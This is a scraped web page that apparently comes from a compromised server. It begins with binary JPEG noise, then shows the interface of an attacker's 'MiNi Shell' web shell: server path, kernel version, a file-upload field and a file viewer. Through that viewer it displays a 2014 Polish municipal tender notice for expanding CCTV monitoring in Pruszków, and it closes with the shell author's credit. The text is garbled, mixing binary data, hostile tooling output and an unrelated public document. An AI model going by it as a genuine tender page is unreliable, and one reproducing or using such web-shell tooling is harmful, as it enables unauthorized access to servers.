JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/201084-N-2014.html

<p class="kh_header"><b>Pruszków: Monitoring miasta - VIII etap.</b><br>
<b>Numer ogłoszenia: 201084 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Pruszków , ul. Kraszewskiego 14/16, 05-800 Pruszków, woj. mazowieckie, tel. 022 7587244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Monitoring miasta - VIII etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na zamówienie składa się:

Monitoring miasta - VIII etap:

1) Zadanie nr 1: 
a/ rozbudowa systemu kamer monitoringu wizyjnego miasta Pruszkowa w rejonie ul. Kopernika 13-15 - 
    kamera obrotowa 1 szt. wraz z montażem, linią światłowodową, przyłączem energetycznym do zasilania 
    kamery i urządzeniami towarzyszącymi, zgodnie z załączonym planem sytuacyjnym (załącznik nr A)
b/ rozbudowa studia i stanowisk operatorskich systemu monitoringu wizyjnego m. Pruszkowa w pokoju  
     nr 95 Urzędu Miejskiego - monitory oraz panele sterujące operatorów (klawiatury) - 3 stanowiska.
Termin realizacji zamówienia:
  Zadanie nr 1 - 4 miesiące od dnia podpisania umowy

2) Zadanie nr 2:
rozbudowa systemu kamer monitoringu wizyjnego miasta Pruszkowa w rejonie Czarnej Drogi PKP (mostek rz. Utrata) - kamera obrotowa 1 szt. wraz z montażem, linią światłowodową, przyłączem energetycznym do zasilania kamery i urządzeniami towarzyszącymi oraz ul. Kurca (zejście schodami do przejścia pod torowiskiem PKP) - kamera stacjonarna 1 szt. wraz z montażem, linią światłowodową, przyłączem energetycznym do zasilania kamery i urządzeniami towarzyszącymi, zgodnie z załączonym planem sytuacyjnym (załącznik nr B)
Termin realizacji zamówienia:
Zadanie nr 2 - 5 miesięcy od dnia podpisania umowy

3) Zadanie nr 3: 
rozbudowa systemu kamer monitoringu wizyjnego miasta Pruszkowa w rejonie parku na osiedlu   
B. Prusa (Żwirowisko) oraz Placu Kardynała Wyszyńskiego - kamera obrotowa 3 szt. wraz z montażem, linią światłowodową, przyłączem energetycznym do zasilania kamery i urządzeniami towarzyszącymi. 
w zgodnie z załączonym planem sytuacyjnym (załącznik nr C) 
Termin realizacji zamówienia:
Zadanie nr 3 - 4 miesiące od dnia podpisania umowy


ZAKRES PRAC:
1. montaż kamer monitoringu miejskiego (obudowa, klosz, wysięgnik) zgodnie z załączonymi planami 
    sytuacyjnymi wraz ze słupami kamerowymi (słupy wyglądem odpowiadające słupom istniejącym
    w danym terenie).
2. podłączenie kamer do istniejącego stanowiska monitoringu wizyjnego w budynku Urzędu Miejskiego 
    w Pruszkowie pok. 95.
3. montowane kamery winny pochodzić z bieżącej produkcji z oficjalnego kanału dystrybucji na Polskę 
    oraz posiadać parametry nie gorsze niż określone w załączniku nr D
4. wykonanie na każde zadanie w trzech egzemplarzach: 
- projektu budowlanego sieci kabli światłowodowych i przyłączy energetycznych do zasilania kamer monitoringu  oraz uzyskanie wszelkich uzgodnień oraz decyzji administracyjnych koniecznych do wykonania powyższych inwestycji m.in. pozwoleń na budowę (w tym uzgodnień z PKP dla zadania nr 2).
- dokumentacji powykonawczej zwierającej teczki: projekt techniczny, elektryczny, karty katalogowe urządzeń, instrukcje obsługi urządzeń w języku polskim, zasady BHP korzystania z urządzeń, atesty, 



certyfikaty urządzeń i wbudowanych materiałów, deklaracje zgodności lub certyfikat zgodności z Polską Normą przenoszącą europejskie normy zharmonizowane
- projektu czasowej organizacji ruchu i uzgodnienie go z właściwym zarządcą drogi i zarządzającym ruchem  
5. uzgodnienie projektu w Zakładzie Energetycznym w celu określenia możliwości podłączenia energii  
    elektrycznej
6. uzyskanie zgody na umieszczenie urządzenia w pasie drogowym od właściwego zarządcy drogi.
7. prace w pasie drogowym należy wykonywać zgodnie z zasadami bezpieczeństwa ruchu drogowego 
    i odpowiednimi przepisami w tym względzie zgodnie z zatwierdzonymi projektami czasowej organizacji
    ruchu
8. budowa przyłączy energetycznych zasilających kamery monitoringu 
9. budowa sieci kabli światłowodowych wielodomowych przy zastosowaniu światłowodów o parametrach 
    technicznych określonych w załączniku nr D rozszycia trasy, spawanie światłowodów, ziemne 
    doprowadzenie kabli światłowodowych do słupów kamerowych dla zadania nr 3 : montaż kabli 
    światłowodowych w istniejących rurach osłonowych
10. doposażenie urządzeń stacjonarnych w centrum monitoringu wizyjnego w budynek Urzędu Miejskiego
    w Pruszkowie pok. 95 w 3 stanowiska robocze w skład których wchodzą monitor, klawiatura sterująca 
    oraz stacja robocza oraz 2 monitory centralne.
     - parametry techniczne monitorów określone w załączniku nr E
     - parametry techniczne klawiatury sterującej oraz stacji roboczej określone w załączniku nr E  
11. uruchomienie urządzeń sieci i centrum monitorowania
12. wszystkie nowe elementy winny być w pełni kompatybilne ze wszystkimi urządzeniami monitoringu  
    wizyjnego obecnie funkcjonującymi oraz posiadać wymagane prawem licencje. W celu prawidłowego 
    doboru sprzętu konieczna jest wizja lokalna i konsultacje w studiu monitoringu w celu uzyskania 
    niezbędnych danych technicznych obecnie funkcjonujących urządzeń.
13. wszystkie urządzenia i środki materiałowe dostarczone przez Wykonawcę w ramach realizacji 
   przedmiotu zamówienia mają być fabrycznie nowe, nieuszkodzone, sprawne technicznie i pozbawione 
   wszelkich wad prawnych. 
14. zapewnienie konserwacji, napraw i obsługi serwisowej zainstalowanych urządzeń wchodzących
   w zakres przedmiotu zamówienia w okresie gwarancji raz na kwartał zgodnie z zaleceniami producenta
    m.in. przegląd techniczny systemu w zakresie sprawdzania prawidłowości działania kamer (optyka, 
   elektronika itp.) oraz stanowisk sterowniczych zainstalowanych w studium monitoringu niezbędnych do
   prawidłowej realizacji zamówienia. Konserwacja nie obejmuje czyszczenia kloszy kamer (oprócz 
   przypadku stwierdzenia nieszczelności obudowy)
15. zapewnienie urządzeń zastępczych w przypadku wystąpienia awarii któregoś z urządzeń wchodzących 
   w zakres przedmiotu zamówienia do momentu jej usunięcia w okresie gwarancji.
16. przeszkolenie osób przewidzianych do pracy na instalowanym sprzęcie

Parametry techniczne:
1. Załącznik nr A: plan sytuacyjny lokalizacji kamery przy ul. Kopernika
2. Załącznik nr B: plan sytuacyjny lokalizacji kamery przy tzw. Czarnej Drodze
3. Załącznik nr C: plan sytuacyjny lokalizacji kamery w parku na osiedlu B. Prusa  ( Żwirowisko) 
oraz Placu Kardynała Wyszyńskiego 3
4. Załącznik nr D: parametry techniczne kamer monitoringu i światłowodu
5. Załącznik nr E: parametry techniczne monitorów, paneli sterujących, stacji roboczych  
 
                     Uwaga:
Zamawiający zastrzega sobie możliwość rezygnacji z zadania nr 2 
w przypadku zbyt wysokich cen ofert.


Gwarancja na wykonane prace i zastosowane urządzenia oraz materiały winna wynosić minimum 24 miesiące od daty odbioru końcowego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7. ustawy w okresie 3 lat od udzielenia zamówienia podstawowego wybranemu wykonawcy, które stanowić będą nie więcej niż 20 %  wartości zamówienia podstawowego i będą polegały na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.32.35.00-8, 29.81.61.00-3, 45.31.62.10-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie o spełnianiu warunku udziału w postępowaniu określonego w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony jeżeli Wykonawca wykaże się 
wykonaniem głównych dostaw  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  - w tym okresie, wykonanych należycie w tym: 
- nie mniej niż 1 zamówienie odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia tj.: wykonanie monitoringu wizyjnego składającego się przynajmniej z 5 kamer 
i 1 stacji bazowej z czego min. 1 kamera oddalona od centrum monitoringu więcej niż 2 km.  
Przedstawiona praca musi mieć wartość min. 50 000,00zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia będzie uznany za spełniony jeżeli Wykonawca wykaże się dysponowaniem osobami zdolnymi do wykonania zamówienia w tym minimum:
- 1 osobą posiadającą uprawnienia do kierowania robotami w specjalności instalacyjnej 
                                w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
- 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi 
                                                                                                      w specjalności telekomunikacyjnej,
wpisanymi na listę członków właściwej Regionalnej Izby Samorządu Zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie o spełnianiu warunku udziału w postępowaniu określonego w art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- nie mniej niż 1 zamówienie odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia tj.: wykonanie monitoringu wizyjnego składającego się przynajmniej z 5 kamer 
i 1 stacji bazowej z czego min. 1 kamera oddalona od centrum monitoringu więcej niż 2 km.  
Przedstawiona praca musi mieć wartość min. 50 000,00zł.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę
1) Formularz ofertowy (według załączonego druku) 
2) Upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawcy 
    UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów 
3) Wykaz prac, które Wykonawca zamierza powierzyć podwykonawcom (jeżeli przewiduje udział podwykonawców w realizacji zamówienia), lub poda nazwy (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. 
4) Opis oferowanych urządzeń (np. opisy techniczne, karty katalogowe itp.)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści  oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach tj.:


- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych 
   przez Zamawiającego lub Wykonawcą, jeżeli te zmiany są korzystne dla Zamawiającego,
- z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez 
   doświadczonego Wykonawcę, prac,
- z powodu niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych które mają wpływ 
   na realizację zamówienia publicznego,
- z powodu przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione. 
- z powodu wystąpienia okoliczności nie zawinionych przez strony,  których nie można było wcześniej przewidzieć,
- w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego.
- wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> cena wersji papierowej - 35,00 PLN
Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
Biuro Zamówień Publicznych
pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 12:00, miejsce: Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com